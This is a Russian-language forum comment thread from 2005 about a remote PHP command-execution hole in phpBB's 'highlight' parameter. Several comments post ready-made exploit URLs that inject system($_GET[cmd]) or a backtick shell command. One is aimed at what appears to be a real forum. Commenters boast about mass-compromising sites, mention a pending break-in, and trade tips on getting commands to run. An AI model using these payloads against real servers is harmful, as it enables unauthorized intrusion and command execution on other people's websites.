Выполнение произвольного PHP сценария в phpBB в коде highlighting

Taras Guest	#1 Это нравится:0 Да/0 Нет 29.06.2005 10:55:46 Обсуждение статьи Выполнение произвольного PHP сценария в phpBB в коде highlighting

Taras Guest	#2 Это нравится:0 Да/0 Нет 30.06.2005 10:57:49 нет там такого кода!

Linker Guest	#3 Это нравится:0 Да/0 Нет 30.06.2005 11:07:11 Есть, плохо смотрел. Только я чет не соображу как работает.

Mag

Guest

Это нравится:0 Да/0 Нет

30.06.2005 11:30:17

Все работает)) Это не менее знаменательная дыра, чем была 5 версий форума назад))) Только используется чуть сложнее)) Но если почитать один оффлайн журнал, который о ней писал еще пару месяцев назад (только не до конца), то можно легко поиметь не один десяток сайтов))ГГ

Mag Guest	#5 Это нравится:0 Да/0 Нет 30.06.2005 11:32:44 Точнее онлайн журнал одной секурити-тим))) Извиняюсь)

Тарас Guest	#6 Это нравится:0 Да/0 Нет 30.06.2005 11:40:23 Как можно использовать эту уязвимость? Чего нет эксплоита?

Linker Guest	#7 Это нравится:0 Да/0 Нет 30.06.2005 11:43:08 2Mag: а что за журнал? Где взять?

PoizOn Guest	#8 Это нравится:0 Да/0 Нет 30.06.2005 11:46:35 журнал скорее всего CP, в нем писали о PHPBB, о какой-то баге найденной ими лично.

White Jordan

Guest

Это нравится:0 Да/0 Нет

30.06.2005 11:50:38

Цитата
Taras пишет: нет там такого кода!

http://www.target.ru/viewtopic.php?t=1&highlight=".system(%2 0$_GET[cmd])."&cmd=uname%20-a

Linker Guest	#10 Это нравится:0 Да/0 Нет 30.06.2005 12:16:51 2White Jordan: Не работает.

Mag

Guest

#11

Это нравится:0 Да/0 Нет

30.06.2005 12:31:18

http://VICTIM.RU/forum/viewtopic.php?p=659&highlight=%27.$po ster=%60КОМАНДА%60.%27
//
вот это полностью работает)) при условии, которое написано в журнале)) скачать можно на rst.void.ru его)) статья: phpbb старые баги в новой упаковке))))
//
пхпбб респект!))) можно весь инет поиметь снова)) как полгода назад было)))

reven Guest	#12 Это нравится:0 Да/0 Нет 30.06.2005 12:43:08 ooo.... вот ето уже дело =) был один не завершонный взлом =) пришло время =)

Mag Guest	#13 Это нравится:0 Да/0 Нет 30.06.2005 16:11:48 Могу написать сплойт, но вот стоит ли)) опять появится толпа скрипткиддисов, крушащих все и вся И phpBB Group тоже странные люди..не написали, что это критическое обновление Гг))

nitrous Guest	#14 Это нравится:0 Да/0 Нет 30.06.2005 16:16:15 что-то нифига не пашет http://forum.novline.ru/viewtopic.php?t=4136&highlight=%27.$ poster=gpi.%27 так?

Mag Guest	#15 Это нравится:0 Да/0 Нет 30.06.2005 16:27:28 там вообще форума нет))

индевять Guest	#16 Это нравится:0 Да/0 Нет 30.06.2005 16:51:45 испорченный телефон [IMG]http://www.securitylab.ru/forum/smileys/smiley4.gif[/IMG]

not_null Guest	#17 Это нравится:0 Да/0 Нет 30.06.2005 21:22:04 Мдя... Видать, кодеры phpBB очень любят пиво Уже 5-ый месяц в форуме находят баги, и все под статусом critical... Обидно, однако...

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#18 Это нравится:0 Да/0 Нет 30.06.2005 22:24:37 Только что-то он ругается... наверное, исходники править надо... "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Nevil Guest	#19 Это нравится:0 Да/0 Нет 30.06.2005 22:37:32 Так, и не получилось у меня заставить работать этот баг, может кто поделится сплоитом, ходябы чтобы ls-al выполнился, у меня даже до этого не дошло.

TeMpo Guest	#20 Это нравится:0 Да/0 Нет 30.06.2005 22:59:56 там выполняются "одиночные" команды.. как только появляется пробел(%20), то не работает.

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?